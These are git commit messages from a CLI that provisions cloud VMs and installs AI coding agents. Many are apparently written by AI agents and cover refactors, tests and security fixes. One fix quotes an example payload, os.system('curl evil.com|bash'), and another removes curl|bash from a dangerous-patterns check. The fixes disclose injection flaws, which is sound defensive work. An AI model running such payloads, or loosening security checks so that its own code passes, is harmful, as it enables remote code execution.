Implement hyperstack/kilocode.sh script that provisions a Hyperstack VM
and installs Kilo Code with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement hyperstack/plandex.sh script that provisions a Hyperstack VM
and installs Plandex with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Koyeb's inject_env_vars used sed escaping that didn't handle single quotes,
allowing API key values containing ' to break out of the shell command string
passed to `koyeb instances exec`. Replace with file-based injection using
generate_env_config + upload_file, matching the safe pattern in shared/common.sh.
Hyperstack goose/gemini/interpreter/codex scripts embedded $OPENROUTER_API_KEY
directly in double-quoted command strings passed to run_server (SSH). Values
containing double quotes, backticks, or $() could execute arbitrary commands
on the remote VM. Replace with inject_env_vars_ssh which writes env vars to a
temp file, uploads via SCP, and appends to shell config without interpolation.
Also hardens Koyeb upload_file to reject remote paths containing shell
metacharacters (', $, `, newline).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Validates that manifest.json is internally consistent and that every
"implemented" matrix entry has a corresponding script file. Catches
configuration drift between manifest.json and the actual file tree.
Tests cover:
- Manifest structure (agents, clouds, matrix top-level keys)
- Agent/cloud definition required fields and naming conventions
- Matrix consistency (valid statuses, complete coverage, no duplicates)
- Script file existence for all implemented entries
- Cloud lib/common.sh existence for clouds with implementations
- Script content basics (shebang, set -eo pipefail, sourcing lib)
- Orphaned script detection (files exist but marked "missing")
Agent: test-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
Implement hyperstack/opencode.sh script that provisions a Hyperstack VM
and installs OpenCode with OpenRouter integration.
Agent: gap-filler-hyperstack-4
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Users who know their preferred cloud but not which agents are available
had no way to find out. Now `spawn hetzner` shows all agents available
on Hetzner, mirroring how `spawn claude` shows all clouds for Claude.
- Add cmdCloudInfo() showing cloud details + available agents
- handleDefaultCommand detects cloud names and routes to cloud info
- Update help text and clouds list footer to document the new command
- Bump CLI version to 0.2.15
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements Amazon Q CLI on Hyperstack cloud provider. Uses Hyperstack's
VM provisioning API with SSH connectivity. Script installs Amazon Q CLI
via curl|bash, injects OpenRouter credentials as environment variables,
and launches interactive Q chat session.
OpenRouter integration via OPENAI_BASE_URL override pointing to
openrouter.ai/api/v1.
Agent: gap-filler-hyperstack-1
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Implement gptme agent on Hyperstack cloud platform.
- Install via pip/pip3
- Native OpenRouter support via OPENROUTER_API_KEY
- Launch with -m openrouter/${MODEL_ID} flag
- Uses Hyperstack VM provisioning and SSH primitives
- OAuth flow for API key (port 5181)
Agent: gap-filler-hyperstack-3
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
README was 4 clouds behind (missing oracle, vastai, hyperstack, koyeb).
Updated from 21→25 clouds, 294→333 combinations.
Changed discovery.sh team lead instructions: README matrix sync is now
the explicit FIRST step (before spawning teammates) and FINAL step
(after all PRs merged) — assigned to team lead, not vague "one teammate".
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Rename the GitHub workflow, scripts, and service from "improve" to
"discovery" to better reflect what the automation does. Remove the
`spawn improve` CLI command entirely — the discovery/refactor loops
are internal automation, not user-facing CLI features.
File renames:
- .github/workflows/improve.yml → discovery.yml
- .claude/skills/.../improve.sh → discovery.sh
- .claude/skills/.../start-improve.sh → start-discovery.sh
- Service: improve-trigger → discovery-trigger
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add Koyeb as a new cloud provider with CLI-based provisioning.
Changes:
- Created koyeb/lib/common.sh with provider primitives
- Implemented koyeb/claude.sh
- Implemented koyeb/aider.sh
- Implemented koyeb/openclaw.sh
- Added Koyeb entry to manifest.json clouds section
- Added matrix entries for all 14 agents
- Created koyeb/README.md with setup instructions
Koyeb features:
- Serverless container platform with per-second billing
- Free tier available (no credit card required)
- Fast deployment times
- Automatic scaling
- Global deployment regions
Agent: cloud-scout-2
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Prevents hangs by adding cleanup traps, structured timeouts with grace
periods, prompt file management, persistent logging, checkpoint creation,
and explicit lifecycle/shutdown instructions in the agent prompt.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Sprite pauses VMs when there's no HTTP activity. During long claude API
calls, the trigger server receives no requests, causing the VM to freeze
mid-cycle. This adds a background loop that pings localhost:8080/health
every 30s to maintain HTTP activity throughout the cycle.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
When users type "spawn sprite claude" instead of "spawn claude sprite",
the CLI now detects the swap and suggests the correct order instead of
showing a confusing "Unknown agent" error. Also fixes grammar in
"spawn agents" and "spawn clouds" output (1 cloud vs 1 clouds).
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).
Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Break down the two longest create_server functions (104 and 102 lines)
into focused sub-functions for readability and reusability:
Scaleway (104 -> 53 lines):
- Extract _scaleway_extract_ip() for IP parsing from server response
- Extract _scaleway_power_on_and_wait() for power-on + polling loop
Fly.io (102 -> 14 lines):
- Extract _fly_create_app() for app creation with "already exists" handling
- Extract _fly_create_and_start_machine() for machine lifecycle
Also fix ((attempt++)) to attempt=$((attempt + 1)) in Fly.io to avoid
potential set -e failures when attempt is 0.
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Break down _get_subnet_id() (101 lines) and create_server() (87 lines)
into smaller, single-responsibility functions:
- _create_vcn(): VCN creation (19 lines)
- _setup_vcn_networking(): Internet gateway, route table, security list (47 lines)
- _create_subnet(): Subnet creation with AD lookup (25 lines)
- _get_subnet_id(): Now just finds or orchestrates creation (22 lines)
- _get_instance_public_ip(): VNIC lookup and IP extraction (27 lines)
- create_server(): Now delegates IP retrieval (59 lines)
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
- Add "Did you mean?" suggestions when agent/cloud names have typos
(using Levenshtein distance, max 3 edits)
- Handle "spawn <agent> --help" to show agent info instead of failing
with "invalid characters" error on the --help flag
- Handle "--help" after subcommands (spawn list --help, spawn agents --help)
to show general help instead of silently ignoring the flag
- Bump CLI version to 0.2.13
- Add 15 tests for levenshtein and findClosestMatch functions
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The compareVersions function decides whether auto-update runs, but had
no direct test coverage. Tests cover: basic comparisons, precedence
ordering (major > minor > patch), missing/extra segments, zero and
boundary versions, non-numeric input handling, parseSemver helper,
realistic spawn version scenarios, and full checkForUpdates integration
with edge-case version strings.
Agent: test-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
The spawn scripts themselves use curl|bash to install agents (e.g.
Claude Code). The validateScriptContent check was blocking our own
legitimate scripts. Removed curl|bash and wget|bash from the
dangerous patterns list since the scripts are already fetched from
our trusted GitHub repo.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The unicode-detect module only modifies TERM, never LANG. Two tests
incorrectly expected LANG to be set to en_US.UTF-8 - fixed to match
actual module behavior.
Agent: team-lead
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Root cause: Bun has a known bug (oven-sh/bun#25767) where --target=node
causes UTF-8 string literals to be double-encoded as Latin-1, producing
mojibake (â instead of ◆/│/✔). Switching to --target=bun avoids this
encoding path entirely.
Also removes the ineffective stdout.write monkey-patch that was
attempting to work around this issue.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- `spawn update` now performs auto-update instead of printing curl command
- `--prompt` without both agent and cloud now errors instead of being silently dropped
- Update banner box uses dynamic padding to align correctly with any version length
Agent: ux-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Extract resolvePrompt() from main() in cli/src/index.ts (98 -> 62 lines)
Separates prompt flag parsing/file-reading from command dispatch
- Extract _validate_oauth_server_args() and _generate_oauth_html() from
start_oauth_server() in shared/common.sh (81 -> 52 lines)
Separates validation/HTML generation from server startup
- Bump CLI version to 0.2.11
Agent: complexity-hunter
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add 16 tests for unicode-detect.ts which had zero coverage.
Tests verify ASCII/Unicode detection based on TERM, SSH,
and SPAWN_UNICODE/SPAWN_ASCII/SPAWN_NO_UNICODE env vars.
Also tests LANG setting and debug output behavior.
Agent: test-engineer
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
- Use --model sonnet (faster, cheaper, sufficient for gap-filling)
- Add timeout 3600s (1h) on claude commands to prevent hangs
- Reduce RUN_TIMEOUT_MS to 75min (safety net above the 1h timeout)
- Previous run hung for 3+ hours with zero output on Opus
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Explicitly convert string chunks to Buffer.from(chunk, 'utf8') before
writing to process.stdout. This fixes UTF-8 mojibake (â instead of ◆/│)
seen in some Bun + terminal combinations (e.g. Ghostty on macOS) where
process.stdout.write(string) doesn't encode as UTF-8 by default.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Added explicit LANG=en_US.UTF-8 and stdout.setEncoding('utf8')
when Unicode mode is enabled. This should prevent UTF-8 mojibake
(â appearing instead of ◆) in terminals like Ghostty.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Adds debug logging to unicode-detect.ts to help troubleshoot why
Unicode rendering isn't working in Ghostty terminal. When SPAWN_DEBUG=1
is set, the CLI will show:
- Current TERM value (e.g., xterm-ghostty)
- SSH environment variables (SSH_CONNECTION, SSH_CLIENT, SSH_TTY)
- Whether ASCII mode is being forced
This will help identify if SSH detection is incorrectly triggering
ASCII fallback for local Ghostty sessions.
Usage: SPAWN_DEBUG=1 spawn list
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
Reverses the overly conservative ASCII-only approach. Now defaults to
Unicode (beautiful spinners, checkmarks, symbols) on local macOS
Terminal, iTerm2, and modern Linux terminals, while still forcing
ASCII fallback for problematic environments:
- SSH sessions (encoding mismatches)
- Dumb terminals (TERM=dumb)
- Users can override with SPAWN_UNICODE=1 or SPAWN_NO_UNICODE=1
This fixes rendering issues while maintaining compatibility across
all environments.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
- Set both TERM=linux and CI=true in unicode-detect.ts
- CI env var provides additional Unicode disabling for @clack/prompts
- Fix test imports to use package.json instead of deleted version.ts
- Bump to 0.2.6
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
- Bumped CLI version from 0.2.4 to 0.2.5
- Added rule to CLAUDE.md: ANY change to cli/ requires a version bump
- Uses semantic versioning (patch for fixes, minor for features, major for breaking)
- Auto-update ensures users get latest version immediately
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
- Changed update banner to use +, -, | instead of Unicode box characters
- Replaced arrow (→) with ASCII arrow (->)
- Changed p.cancel() to plain console.error to avoid Unicode bullet
- Ensures clean rendering on all terminals regardless of Unicode support
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
